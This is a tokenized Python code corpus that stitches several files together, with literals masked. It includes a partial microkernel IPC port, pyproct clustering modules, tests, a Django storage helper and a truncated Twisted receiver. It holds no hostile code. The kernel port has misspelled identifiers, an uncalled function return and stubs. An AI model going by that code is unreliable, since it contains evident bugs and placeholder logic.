<s> def _set_idle_name ( name , n ) : <EOL> p_z = False <EOL> if n > <NUM_LIT> : <EOL> n = <NUM_LIT> <EOL> name = '<STR_LIT>' <EOL> i = <NUM_LIT:4> <EOL> c = <NUM_LIT:100> <EOL> while c > <NUM_LIT:0> : <EOL> digit = n // c <EOL> n -= digit * c <EOL> if p_z or digit != <NUM_LIT:0> or c == <NUM_LIT:1> : <EOL> p_z = True <EOL> name = '<STR_LIT>' . join ( [ name , chr ( ord ( '<STR_LIT:0>' ) + digit ) ] ) <EOL> i += <NUM_LIT:1> <EOL> c = c // <NUM_LIT:10> <EOL> return name <EOL> PICK_ANY = <NUM_LIT:1> <EOL> PICK_HIGHERONLY = <NUM_LIT:2> <EOL> def BuildNotifyMessage ( m_ptr , src , dst_ptr ) : <EOL> m_ptr [ '<STR_LIT>' ] = NOTIFY_MESSAGE <EOL> m_ptr [ '<STR_LIT>' ] = get_monotonic ( ) <EOL> if src == HARDWARE : <EOL> m_ptr [ '<STR_LIT>' ] = dst_ptr [ '<STR_LIT>' ] <EOL> dst_ptr [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> elif src == SYSTEM : <EOL> m_ptr [ '<STR_LIT>' ] = dst_ptr [ '<STR_LIT>' ] <EOL> dst_ptr [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> def proc_init ( ) : <EOL> rp = BEG_PROC_ADDR + <NUM_LIT:1> <EOL> i = - NR_TASKS + <NUM_LIT:1> <EOL> while rp < END_PROC_ADDR : <EOL> rp [ '<STR_LIT>' ] = RTS_SLOT_FREE <EOL> rp [ '<STR_LIT>' ] = PMAGIC <EOL> rp [ '<STR_LIT>' ] = i <EOL> rp [ '<STR_LIT>' ] = _ENDPOINT ( <NUM_LIT:0> , rp [ '<STR_LIT>' ] ) <EOL> rp [ '<STR_LIT>' ] = None <EOL> rp [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> rp [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> arch_proc_reset ( rp ) <EOL> rp += <NUM_LIT:1> <EOL> i += <NUM_LIT:1> <EOL> sp = BEG_PRIV_ADDR + <NUM_LIT:1> <EOL> i = <NUM_LIT:1> <EOL> while sp < END_PRIV_ADDR : <EOL> sp [ '<STR_LIT>' ] = NONE <EOL> sp [ '<STR_LIT>' ] = sys_id_t ( i ) <EOL> ppriv_addr [ i ] = sp <EOL> sp [ '<STR_LIT>' ] = NONE <EOL> sp [ '<STR_LIT>' ] = NONE <EOL> sp += <NUM_LIT:1> <EOL> i += <NUM_LIT:1> <EOL> idle_priv . 
s_flags = IDL_F <EOL> for i in range ( CONFIG_MAX_CPUS ) : <EOL> ip = get_cpu_var_ptr ( i , idle_proc ) <EOL> ip [ '<STR_LIT>' ] = IDLE <EOL> ip [ '<STR_LIT>' ] = idle_priv <EOL> ip [ '<STR_LIT>' ] |= RTS_PROC_STOP <EOL> _set_idle_name ( ip [ '<STR_LIT>' ] , i ) <EOL> def _switch_address_space_idle ( ) : <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> def _idle ( ) : <EOL> '''<STR_LIT>''' <EOL> if priv ( p ) [ '<STR_LIT>' ] & BILLABLE : <EOL> CPULOCAL_STRUCT [ <NUM_LIT:0> ] [ bill_ptr ] = p <EOL> _switch_address_space_idle ( ) <EOL> restart_local_timer ( ) <EOL> '''<STR_LIT>''' <EOL> context_stop ( proc_addr ( KERNEL ) ) <EOL> if not SPROFILE : <EOL> halt_cpu ( ) <EOL> else : <EOL> if not sprofiling : <EOL> halt_cpu ( ) <EOL> else : <EOL> v = get_cpulocal_var_ptr ( idle_interrupted ) <EOL> interrupts_enable ( ) <EOL> while not v : <EOL> arch_pause ( ) <EOL> interrupts_disable ( ) <EOL> v = <NUM_LIT:0> <EOL> '''<STR_LIT>''' <EOL> def switch_to_user ( ) : <EOL> pass <EOL> def _do_sync_ipc ( caller_ptr , call_nr , src_dst_e , m_ptr ) : <EOL> '''<STR_LIT>''' <EOL> if ( <EOL> call_nr < <NUM_LIT:0> or <EOL> call_nr > IPCNO_HIGHEST or <EOL> call_nr >= <NUM_LIT:32> or <EOL> callname != ipc_call_names [ call_nr ] <EOL> ) : <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' <EOL> . format ( call_nr , proc_nr ( caller_ptr ) , src_dst_e ) ) <EOL> return ETRAPDENIED <EOL> if src_dst_e == ANY : <EOL> if call_nr != RECEIVE : <EOL> return EINVAL <EOL> src_dst_p = int ( src_dst_e ) <EOL> else : <EOL> if not isokendpt ( src_dst_e , src_dst_p ) : <EOL> return EDEADSRCDST <EOL> '''<STR_LIT>''' <EOL> if call_nr != RECEIVE : <EOL> if not may_send_to ( caller_ptr , src_dst_p ) : <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' <EOL> . 
format ( callname , caller_ptr [ '<STR_LIT>' ] , <EOL> src_dst_e ) ) <EOL> return ECALLDENIED <EOL> '''<STR_LIT>''' <EOL> if not priv ( caller_ptr ) [ '<STR_LIT>' ] & ( <NUM_LIT:1> << call_nr ) : <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' <EOL> . format ( callname , caller_ptr [ '<STR_LIT>' ] , src_dst_e ) ) <EOL> return ETRAPDENIED <EOL> if call_nr != SENDREC and call_nr != RECEIVE and iskerneln ( src_dst_p ) : <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' <EOL> . format ( callname , caller_ptr [ '<STR_LIT>' ] , src_dst_e ) ) <EOL> return ETRAPDENIED <EOL> if call_nr == SENDREC : <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_REPLY_PEND <EOL> elif call_nr == SEND : <EOL> result = mini_send ( caller_ptr , src_dst_e , m_ptr , <NUM_LIT:0> ) <EOL> if call_nr == SEND or result != OK : <EOL> pass <EOL> elif call_nr == RECEIVE : <EOL> caller_ptr [ '<STR_LIT>' ] &= ~ MF_REPLY_PEND <EOL> IPC_STATUS_CLEAR ( caller_ptr ) <EOL> result = mini_receive ( caller_ptr , src_dst_e , m_ptr , <NUM_LIT:0> ) <EOL> elif call_nr == NOTIFY : <EOL> result = mini_notify ( caller_ptr , src_dst_e ) <EOL> elif call_nr == SENDNB : <EOL> result = mini_send ( caller_ptr , src_dst_e , m_ptr , NON_BLOCKING ) <EOL> else : <EOL> result = EBADCALL <EOL> return result <EOL> def do_ipc ( r1 , r2 , r3 ) : <EOL> caller_ptr = get_cpulocal_var ( proc_ptr ) <EOL> call_nr = r1 <EOL> assert ( not RTS_ISSET ( caller_ptr , RTS_SLOT_FREE ) ) <EOL> kbill_ipc = caller_ptr <EOL> if caller_ptr [ '<STR_LIT>' ] & ( MF_SC_TRACE | MR_SC_DEFER ) : <EOL> if ( <EOL> ( caller_ptr [ '<STR_LIT>' ] & ( MF_SC_TRACE | MR_SC_DEFER ) ) == <EOL> MF_SC_TRACE <EOL> ) : <EOL> '''<STR_LIT>''' <EOL> caller_ptr [ '<STR_LIT>' ] &= ~ MF_SC_TRACE <EOL> assert ( not caller_ptr [ '<STR_LIT>' ] & MR_SC_DEFER ) <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_SC_DEFER <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = r1 <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = r2 <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = r3 
<EOL> cause_sig ( proc_nr ( caller_ptr ) , SIGTRAP ) <EOL> return caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> caller_ptr [ '<STR_LIT>' ] &= ~ MF_SC_DEFER <EOL> assert ( not caller_ptr [ '<STR_LIT>' ] & MF_SC_ACTIVE ) <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_SC_ACTIVE <EOL> if caller [ '<STR_LIT>' ] & MF_DELIVERMSG : <EOL> panic ( '<STR_LIT>' <EOL> . format ( caller_ptr [ '<STR_LIT>' ] , caller_ptr [ '<STR_LIT>' ] ) ) <EOL> '''<STR_LIT>''' <EOL> if call_nr in [ SENDREC , SEND , RECEIVE , NOTIFY , SENDNB ] : <EOL> return _do_sync_ipc ( caller_ptr , call_nr , r2 , r3 ) <EOL> elif call_nr == SENDA : <EOL> msg_size = len ( r2 ) <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> if msg_size > <NUM_LIT:16> * ( NR_TASKS + NR_PROCS ) : <EOL> return EDOM <EOL> return mini_senda ( caller_ptr , r3 , msg_size ) <EOL> elif call_nr == PYTHONIX_KERNINFO : <EOL> if not pythonix_kerninfo_user : <EOL> return EBADCALL <EOL> arch_set_secondary_ipc_return ( caller_ptr , pythonix_kerninfo_user ) <EOL> return OK <EOL> else : <EOL> return EBADCALL <EOL> def _deadlock ( function , cp , src_dst_e ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> def _has_pending ( map_ , src_p , asynm ) : <EOL> id_ = NULL_PRIV_ID <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> if src_p != ANY : <EOL> src_id = nr_to_id ( src_p ) <EOL> if get_sys_bit ( map_ , src_id ) : <EOL> pass <EOL> '''<STR_LIT>''' <EOL> else : <EOL> aux = True <EOL> for src_id in range ( <NUM_LIT:0> , NR_SYS_PROCS , BITCHUNCK_BITS ) : <EOL> if get_sys_bits ( _map , src_id ) != <NUM_LIT:0> : <EOL> '''<STR_LIT>''' <EOL> if aux : <EOL> while not get_sys_bit ( map_ , src_id ) : <EOL> src_id += <NUM_LIT:1> <EOL> aux = False <EOL> break <EOL> if src_id < NR_SYS_PROCS : <EOL> id_ = src_id <EOL> return id_ <EOL> def has_pending_notify ( caller , src_p ) : <EOL> _map = priv ( caller ) [ '<STR_LIT>' ] <EOL> return _has_pending ( _map , src_p , <NUM_LIT:0> ) <EOL> def has_pending_asend ( caller , src_p ) : <EOL> _map = priv ( caller 
) [ '<STR_LIT>' ] <EOL> return _has_pending ( _map , src_p , <NUM_LIT:1> ) <EOL> def unset_notify_pending ( caller , src_p ) : <EOL> _map = priv ( caller ) [ '<STR_LIT>' ] <EOL> unset_sys_bit ( _map , src_p ) <EOL> def mini_send ( caller_ptr , dst_e , m_ptr , flags ) : <EOL> dst_p = ENDPOINT ( dst_e ) <EOL> dst_ptr = proc_addr ( dst_p ) <EOL> if RTS_ISSET ( dst_ptr , RTS_NO_ENDPOINT ) : <EOL> return EDEADSRCDST <EOL> '''<STR_LIT>''' <EOL> if WILLRECEIVE ( dst_ptr , caller_ptr [ '<STR_LIT>' ] ) : <EOL> assert ( not ( dst_ptr [ '<STR_LIT>' ] & MF_DELIVERMSG ) ) <EOL> if not ( flags & FROM_KERNEL ) : <EOL> if copy_msg_from_user ( m_ptr , dst_ptr [ '<STR_LIT>' ] ) : <EOL> return EFAULT <EOL> else : <EOL> dst_ptr [ '<STR_LIT>' ] = m_ptr <EOL> IPC_STATUS_ADD_FLAGS ( dst_ptr , IPC_FLG_MSG_FROM_KERNEL ) <EOL> dst_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = caller_ptr [ '<STR_LIT>' ] <EOL> dst_ptr [ '<STR_LIT>' ] |= MF_DELIVERMSG <EOL> if caller_ptr [ '<STR_LIT>' ] & MF_REPLY_PEND : <EOL> call = SENDREC <EOL> else : <EOL> if flags & NON_BLOCKING : <EOL> call = SENDNB <EOL> else : <EOL> call = SEND <EOL> IPC_STATUS_ADD_CALL ( dst_ptr , call ) <EOL> if dst_ptr [ '<STR_LIT>' ] & MF_REPLY_PEND : <EOL> dst_ptr [ '<STR_LIT>' ] &= ~ MF_REPLY_PEND <EOL> RTS_UNSET ( dst_ptr , RTS_RECEIVING ) <EOL> if DEBUG_IPC_HOOK : <EOL> hook_ipc_msgsend ( dst_ptr [ '<STR_LIT>' ] , caller_ptr , dst_ptr ) <EOL> hook_ipc_msgrecv ( dst_ptr [ '<STR_LIT>' ] , caller_ptr , dst_ptr ) <EOL> else : <EOL> if flags & NON_BLOCKING : <EOL> return ENOTREADY <EOL> if deadlock ( send , caler_ptr , dst_e ) : <EOL> return ELOCKED <EOL> if not ( flags & FROM_KERNEL ) : <EOL> if copy_msg_from_user ( m_ptr , caller_ptr [ '<STR_LIT>' ] ) : <EOL> return EFAULT <EOL> else : <EOL> caller_ptr [ '<STR_LIT>' ] = m_ptr <EOL> '''<STR_LIT>''' <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_SENDING_FROM_KERNEL <EOL> RTS_SET ( caller_ptr , RTS_SENDING ) <EOL> caller_ptr [ '<STR_LIT>' ] = dst_e <EOL> assert ( caller_ptr [ '<STR_LIT>' ] == None ) 
<EOL> '''<STR_LIT>''' <EOL> if DEBUG_IPC_HOOK : <EOL> hook_ipc_msgsend ( caller_ptr [ '<STR_LIT>' ] , caller_ptr , dst_ptr ) <EOL> return OK <EOL> def _mini_receive ( caller_ptr , src_e , m_buff_usr , flags ) : <EOL> def receive_done ( caller_ptr ) : <EOL> if caller_ptr [ '<STR_LIT>' ] & MF_REPLY_PEND : <EOL> caller_ptr [ '<STR_LIT>' ] &= ~ MR_REPLY_PEND <EOL> return OK <EOL> '''<STR_LIT>''' <EOL> assert ( not ( caller_ptr [ '<STR_LIT>' ] & MF_ELIVERMSG ) ) <EOL> caller_ptr [ '<STR_LIT>' ] = m_buff_usr <EOL> if src_e == ANY : <EOL> src_p = ANY <EOL> else : <EOL> okendpt ( src_e , src_p ) <EOL> if RTS_ISSET ( proc_addr ( src_p ) , RTS_NO_ENDPOINT ) : <EOL> return EDEADSRCDST <EOL> '''<STR_LIT>''' <EOL> if not RTS_ISSET ( caller_ptr , RTS_SENDING ) : <EOL> if not ( caller_ptr [ '<STR_LIT>' ] & MF_REPLY_PEND ) : <EOL> src_id = has_pending_notify ( caller_ptr , src_p ) <EOL> if src_id != NULL_PRIV_ID : <EOL> src_proc_nr = id_to_nr ( src_id ) <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' , src_proc_nr ) <EOL> assert ( src_proc_nr != NONE ) <EOL> unset_notify_pending ( caller_ptr , src_id ) <EOL> hisep = proc_addr ( src_proc_nr ) [ '<STR_LIT>' ] <EOL> assert ( not ( caller_ptr [ '<STR_LIT>' ] & MF_DELIVERMSG ) ) <EOL> assert ( src_e == ANY or hisep == src_e ) <EOL> BuildNotifyMessage ( caller_ptr [ '<STR_LIT>' ] , <EOL> src_proc_nr , <EOL> caller_ptr ) <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = hisep <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_DELIVERMSG <EOL> IPC_STATUS_ADD_CALL ( caller_ptr , NOTIFY ) <EOL> return receive_done ( caller_ptr ) <EOL> if has_pending_asend ( caller_ptr , src_p ) != NULL_PRIV_ID : <EOL> if src_p != ANY : <EOL> r = try_one ( proc_addr ( src_p ) , caller_ptr ) <EOL> else : <EOL> r = try_async ( caller_ptr ) <EOL> if r == OK : <EOL> IPC_STATUS_ADD_CALL ( caller_ptr , SENDA ) <EOL> return receive_done <EOL> '''<STR_LIT>''' <EOL> """<STR_LIT>""" <EOL> '''<STR_LIT>''' <EOL> if not ( flags & NON_BLOCKING ) : <EOL> if _deadlock ( 
RECEIVE , caller_ptr , src_e ) : <EOL> return ELOCKED <EOL> caller_ptr [ '<STR_LIT>' ] = src_e <EOL> RTS_SET ( caller_tr , RTS_RECEIVING ) <EOL> return OK <EOL> else : <EOL> return ENOTREADY <EOL> return receive_done ( caller_ptr ) </s>
<s> import sys , re <EOL> import os <EOL> def main ( ) : <EOL> upload_command = "<STR_LIT>" <EOL> if len ( sys . argv ) > <NUM_LIT:1> and sys . argv [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> upload_command = "<STR_LIT>" <EOL> os . chdir ( "<STR_LIT:..>" ) <EOL> os . system ( "<STR_LIT>" + upload_command ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" + upload_command ) <EOL> print ( """<STR_LIT>""" ) <EOL> print ( """<STR_LIT>""" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import pyproct . clustering . algorithms . dbscan . cython . cythonDbscanTools as dbscanTools <EOL> from pyproct . clustering . algorithms . dbscan . cython . cythonDbscanTools import k_scale_gen , k_dist , zhou_adaptative_determination <EOL> import numpy <EOL> import math <EOL> class ParametersGenerator ( object ) : <EOL> def __init__ ( self , parameters , matrix_handler ) : <EOL> """<STR_LIT>""" <EOL> self . distance_matrix = matrix_handler . distance_matrix <EOL> self . parameters = parameters <EOL> @ classmethod <EOL> def get_base_parameters ( cls ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None <EOL> } <EOL> def get_parameters ( self ) : <EOL> """<STR_LIT>""" <EOL> run_parameters = [ ] <EOL> if "<STR_LIT>" in self . parameters [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] : <EOL> max_eps_tries = self . parameters [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> else : <EOL> max_eps_tries = <NUM_LIT:10> <EOL> num_elements = self . distance_matrix . row_length <EOL> klist = k_scale_gen ( math . log ( num_elements ) ) <EOL> buffer = numpy . empty ( num_elements ) <EOL> kdist_matrix = k_dist ( klist , buffer , self . distance_matrix ) <EOL> dbscan_param_pairs = dbscanTools . dbscan_param_space_search ( self . parameters [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> max_eps_tries , <EOL> num_elements , <EOL> klist , <EOL> kdist_matrix ) + zhou_adaptative_determination ( kdist_matrix , self . distance_matrix ) <EOL> for ( minpts , eps ) in dbscan_param_pairs : <EOL> run_parameter = ParametersGenerator . get_base_parameters ( ) <EOL> run_parameter [ "<STR_LIT>" ] = minpts <EOL> run_parameter [ "<STR_LIT>" ] = eps <EOL> run_parameters . append ( run_parameter ) <EOL> return run_parameters , [ ] </s>
<s> """<STR_LIT>""" <EOL> class Analysis ( object ) : <EOL> def __init__ ( self , name , analysis_function , other_params = None ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . analysis_function = analysis_function <EOL> self . other_params = other_params <EOL> def run ( self , clustering ) : <EOL> """<STR_LIT>""" <EOL> if self . other_params : <EOL> return self . analysis_function ( clustering , self . other_params ) <EOL> else : <EOL> return self . analysis_function ( clustering ) </s>
<s> """<STR_LIT>""" <EOL> import pyproct . clustering . algorithms . gromos . parametersGeneration as gromosParametersGeneration <EOL> import pyproct . clustering . algorithms . kmedoids . parametersGeneration as kmedoidsParametersGeneration <EOL> import pyproct . clustering . algorithms . random . parametersGeneration as randomParametersGeneration <EOL> import pyproct . clustering . algorithms . spectral . parametersGeneration as spectralParametersGeneration <EOL> import pyproct . clustering . algorithms . hierarchical . parametersGeneration as hierarchicalParametersGeneration <EOL> import pyproct . clustering . algorithms . dbscan . parametersGeneration as dbscanParametersGeneration <EOL> class AlgorithmRunParametersGenerator ( object ) : <EOL> def __init__ ( self , parameters , matrix_handler ) : <EOL> """<STR_LIT>""" <EOL> self . matrix_handler = matrix_handler <EOL> self . parameters = parameters <EOL> def get_parameters_for_type ( self , algorithm_type ) : <EOL> """<STR_LIT>""" <EOL> generator = None <EOL> if algorithm_type == "<STR_LIT>" : <EOL> generator = gromosParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = spectralParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = kmedoidsParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = hierarchicalParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = dbscanParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> elif algorithm_type == "<STR_LIT>" : <EOL> generator = randomParametersGeneration . ParametersGenerator ( self . parameters , self . matrix_handler ) <EOL> return generator . 
get_parameters ( ) </s>
<s> """<STR_LIT>""" <EOL> import glob <EOL> import os <EOL> from pyproct . data . handler . dataSource import DataSource <EOL> import json <EOL> from pyproct . tools . commonTools import convert_to_utf8 <EOL> import copy <EOL> class SourceGenerator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , source_list ) : <EOL> self . source_list = [ DataSource ( source ) for source in SourceGenerator . inflate_source_list ( source_list ) ] <EOL> @ classmethod <EOL> def inflate_source_list ( cls , source_list ) : <EOL> inflated_list = [ ] <EOL> for source in source_list : <EOL> if isinstance ( source , basestring ) : <EOL> _ , ext = os . path . splitext ( source ) <EOL> if ext == "<STR_LIT>" : <EOL> try : <EOL> inflated_list . extend ( cls . inflate_source_list ( cls . get_sources_from_file_list ( source ) ) ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" % source <EOL> print e . message <EOL> exit ( ) <EOL> else : <EOL> inflated_list . extend ( cls . do_glob ( source ) ) <EOL> else : <EOL> inflated_list . extend ( cls . get_sources_from_dictionary ( source ) ) <EOL> return inflated_list <EOL> @ classmethod <EOL> def do_glob ( cls , path ) : <EOL> paths = glob . glob ( path ) <EOL> if len ( paths ) > <NUM_LIT:0> : <EOL> return paths <EOL> else : <EOL> print "<STR_LIT>" % path <EOL> exit ( ) <EOL> @ classmethod <EOL> def get_sources_from_file_list ( cls , list_file ) : <EOL> """<STR_LIT>""" <EOL> return [ convert_to_utf8 ( json . loads ( line ) ) for line in open ( list_file , "<STR_LIT:r>" ) ] <EOL> @ classmethod <EOL> def get_sources_from_dictionary ( cls , info_dict ) : <EOL> """<STR_LIT>""" <EOL> inflated_dics = [ ] <EOL> for path in cls . do_glob ( info_dict [ "<STR_LIT:source>" ] ) : <EOL> clone = copy . deepcopy ( info_dict ) <EOL> clone [ "<STR_LIT:source>" ] = path <EOL> inflated_dics . append ( clone ) <EOL> return inflated_dics </s>
<s> """<STR_LIT>""" <EOL> from pyproct . driver . observer . accumulativeObserver import AccumulativeObserver <EOL> class Observable ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , observer = None ) : <EOL> if not observer is None : <EOL> self . observer = observer <EOL> else : <EOL> self . observer = AccumulativeObserver ( ) <EOL> def notify ( self , action , message ) : <EOL> self . observer . notify ( self . __class__ . __name__ , action , message ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> from pyRMSD . condensedMatrix import CondensedMatrix <EOL> import numpy <EOL> from pyproct . postprocess . actions . confSpaceComparison . overlapCalculator import OverlapCalculator <EOL> class Test ( unittest . TestCase ) : <EOL> def test_calculate_global_overlap ( self ) : <EOL> distance_matrix = CondensedMatrix ( [ <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT:1.> , <EOL> <NUM_LIT> ] ) <EOL> decomposed_clusters = [ { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] } , { "<STR_LIT>" : [ <NUM_LIT:2> ] , "<STR_LIT>" : [ <NUM_LIT:3> ] } ] <EOL> self . assertEqual ( <NUM_LIT:0.> , OverlapCalculator . calculate_global_overlap ( decomposed_clusters , distance_matrix , <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> decomposed_clusters = [ { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] } , { "<STR_LIT>" : [ <NUM_LIT:2> ] } , { "<STR_LIT>" : [ <NUM_LIT:3> ] } ] <EOL> self . assertEqual ( <NUM_LIT:0.> , OverlapCalculator . calculate_global_overlap ( decomposed_clusters , distance_matrix , <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> def test_calculate_cluster_overlap ( self ) : <EOL> distance_matrix = CondensedMatrix ( [ <NUM_LIT:1.> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> decomposed_cluster = { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] , "<STR_LIT>" : [ <NUM_LIT:2> ] } <EOL> self . assertAlmostEqual ( <NUM_LIT> , OverlapCalculator . calculate_cluster_overlap ( <NUM_LIT:1> , decomposed_cluster , distance_matrix ) , <NUM_LIT:12> ) <EOL> self . assertAlmostEqual ( <NUM_LIT> , OverlapCalculator . calculate_cluster_overlap ( <NUM_LIT:2> , decomposed_cluster , distance_matrix ) , <NUM_LIT:12> ) <EOL> decomposed_cluster = { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] } <EOL> self . assertAlmostEqual ( <NUM_LIT:1.> , OverlapCalculator . calculate_cluster_overlap ( <NUM_LIT:1> , decomposed_cluster , distance_matrix ) , <NUM_LIT:12> ) <EOL> self . 
assertAlmostEqual ( <NUM_LIT:1.> , OverlapCalculator . calculate_cluster_overlap ( <NUM_LIT:2> , decomposed_cluster , distance_matrix ) , <NUM_LIT:12> ) <EOL> def test_get_cluster_min_max_distances ( self ) : <EOL> distance_matrix = CondensedMatrix ( [ <NUM_LIT:1.> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> decomposed_cluster = { "<STR_LIT>" : [ <NUM_LIT:0> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] , "<STR_LIT>" : [ <NUM_LIT:2> ] } <EOL> expected_min_d , expected_max_d = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT> ] <EOL> min_d , max_d = OverlapCalculator . get_cluster_min_max_distances ( decomposed_cluster , distance_matrix ) <EOL> numpy . testing . assert_array_almost_equal ( min_d , expected_min_d , <NUM_LIT:8> ) <EOL> numpy . testing . assert_array_almost_equal ( max_d , expected_max_d , <NUM_LIT:8> ) <EOL> distance_matrix = CondensedMatrix ( [ <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT:1.> , <EOL> <NUM_LIT> ] ) <EOL> decomposed_cluster = { "<STR_LIT>" : [ <NUM_LIT:0> , <NUM_LIT:3> ] , "<STR_LIT>" : [ <NUM_LIT:1> ] , "<STR_LIT>" : [ <NUM_LIT:2> ] } <EOL> expected_min_d , expected_max_d = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT> ] <EOL> min_d , max_d = OverlapCalculator . get_cluster_min_max_distances ( decomposed_cluster , distance_matrix ) <EOL> numpy . testing . assert_array_almost_equal ( min_d , expected_min_d , <NUM_LIT:8> ) <EOL> numpy . testing . assert_array_almost_equal ( max_d , expected_max_d , <NUM_LIT:8> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> def handle_matrix_test_class ( ) : <EOL> return AnotherMatrixTestClass <EOL> class AnotherMatrixTestClass ( ) : <EOL> def __init__ ( self ) : <EOL> pass </s>
<s> from db_file_storage . storage import DatabaseFileStorage <EOL> def delete_file_if_needed ( instance , filefield_name ) : <EOL> """<STR_LIT>""" <EOL> if instance . id : <EOL> model_class = type ( instance ) <EOL> if model_class . objects . filter ( pk = instance . pk ) . exclude ( <EOL> ** { '<STR_LIT>' % filefield_name : True } <EOL> ) . exclude ( <EOL> ** { '<STR_LIT>' % filefield_name : '<STR_LIT>' } <EOL> ) . exists ( ) : <EOL> old_file = getattr ( <EOL> model_class . objects . only ( filefield_name ) . get ( pk = instance . id ) , <EOL> filefield_name <EOL> ) <EOL> else : <EOL> old_file = None <EOL> if old_file : <EOL> if ( old_file . name == getattr ( instance , filefield_name ) ) is False : <EOL> DatabaseFileStorage ( ) . delete ( old_file . name ) <EOL> def delete_file ( instance , filefield_name ) : <EOL> """<STR_LIT>""" <EOL> file_instance = getattr ( instance , filefield_name ) <EOL> if file_instance : <EOL> DatabaseFileStorage ( ) . delete ( file_instance . name ) </s>
<s> from twisted . internet import reactor <EOL> from twisted . internet . protocol import Factory <EOL> from twisted . internet . error import ConnectionDone <EOL> from twisted . protocols . basic import LineOnlyReceiver <EOL> import sys <EOL> from conf import * <EOL> from session_inspector import SessionInspectorMemcache <EOL> class InspectorReceiver ( LineOnlyReceiver ) : <EOL> delimiter = '<STR_LIT:\r\n>' <EOL> def __init__ ( self ) : <EOL> self . inspector = SessionInspectorMemcache ( ) <EOL> def connectionMade ( self ) : <EOL> self . peer = self . transport . getPeer ( ) <EOL> self . peerAddr = "<STR_LIT>" % ( self . peer . host , self . peer . port ) <EOL> print ( "<STR_LIT>" % ( self . __class__ . __name__ , self . peerAddr ) ) <EOL> def connectionLost ( self , reason ) : <EOL> if reason . check ( ConnectionDone ) : <EOL> print ( "<STR_LIT>" % ( self . __class__ . __name__ , self . peerAddr ) ) <EOL> else : <EOL> print ( "<STR_LIT>" % ( self . __class__ . __name__ , self . peerAddr , reason . value ) ) <EOL> def isAuth ( self , is_auth ) : <EOL> self . transport . write ( "<STR_LIT>" % ( is_auth , ) ) <EOL> def lineReceived ( self , line ) : <EOL> try : <EOL> values = line . strip ( ) . split ( ) <EOL> if len ( values ) < <NUM_LIT:1> : <EOL> pass 